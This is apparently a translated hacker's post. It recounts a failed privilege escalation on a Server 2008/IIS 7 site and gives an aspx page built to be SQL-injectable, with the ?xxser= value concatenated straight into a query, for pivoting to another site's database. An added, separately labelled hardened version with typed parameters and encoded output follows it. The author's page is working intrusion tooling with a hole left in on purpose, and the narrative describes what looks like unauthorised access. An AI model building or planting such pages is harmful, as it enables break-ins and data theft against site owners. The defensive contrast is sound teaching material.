Yesterday 4z1 and I were looking at a site; privilege escalation was really hard, we spent a full 5 hours on it with no result. Server 2008 + IIS 7, no sa, no root, no services of any kind...
Along the way we used an aspx page with a constructed injection point to cross over to another site. I found a pile of code online and not one piece of it worked.
It's not much code, so I just wrote my own and had done with it. So annoying.
<%@ Page Language="C#" %>

<script runat="server">
    // Deliberately injectable page: the raw value of ?xxser= is concatenated
    // straight into the SQL text, which is exactly what the post sets out to build.
    void Page_Init(object sender, EventArgs e)
    {
        // "连接名" is the name of the connection string entry in web.config.
        string cs = ConfigurationManager.ConnectionStrings["连接名"].ConnectionString;
        using (System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection(cs))
        {
            conn.Open();
            string i = this.Page.Request.Params["xxser"]; // the parameter comes in as ?xxser=1
            System.Data.SqlClient.SqlCommand command =
                new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
            // ExecuteNonQuery runs the statement but returns -1 for a SELECT; the query itself still executes.
            int x = command.ExecuteNonQuery();
            Response.Write(i + "\n");
            Response.Write(x);
        }
    }
</script>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title>暗影aspx构造注射专用页面</title>
</head>
<body>
    <form id="form1" runat="server">
    <div>
    </div>
    </form>
</body>
</html>
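For contrast, the same page as a defender would write it. This is an added example, not the author's code or part of the original post; it keeps the author's placeholders 连接名, [表] and 列名 and assumes the column is an integer, so the request value is validated and bound as a typed parameter instead of being spliced into the SQL text, and the echoed value is HTML-encoded.

```csharp
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Data" %>
<%@ Import Namespace="System.Data.SqlClient" %>

<script runat="server">
    // Hardened counterpart of the injectable page: the value of ?xxser= never
    // becomes part of the SQL string. It must parse as an int, and it is sent
    // to SQL Server as a typed parameter, so quotes, "or 1=1" or a stacked
    // statement are either rejected up front or treated purely as data.
    void Page_Load(object sender, EventArgs e)
    {
        int id;
        if (!int.TryParse(Request.QueryString["xxser"], out id))
        {
            Response.StatusCode = 400;
            Response.Write("bad request");
            return;
        }

        // "连接名" is the connection string entry in web.config (author's placeholder).
        string cs = ConfigurationManager.ConnectionStrings["连接名"].ConnectionString;
        using (SqlConnection conn = new SqlConnection(cs))
        using (SqlCommand cmd = new SqlCommand("select count(*) from [表] where 列名 = @id", conn))
        {
            cmd.Parameters.Add("@id", SqlDbType.Int).Value = id;
            conn.Open();
            int rows = (int)cmd.ExecuteScalar();
            // Encode anything reflected back so the page is not a reflected-XSS sink either.
            Response.Write(HttpUtility.HtmlEncode(id.ToString()) + "\n");
            Response.Write(rows);
        }
    }
</script>
```

The only remaining leak in this version is the exception text a failed query would return; setting customErrors mode="On" in web.config keeps SQL error details off the response.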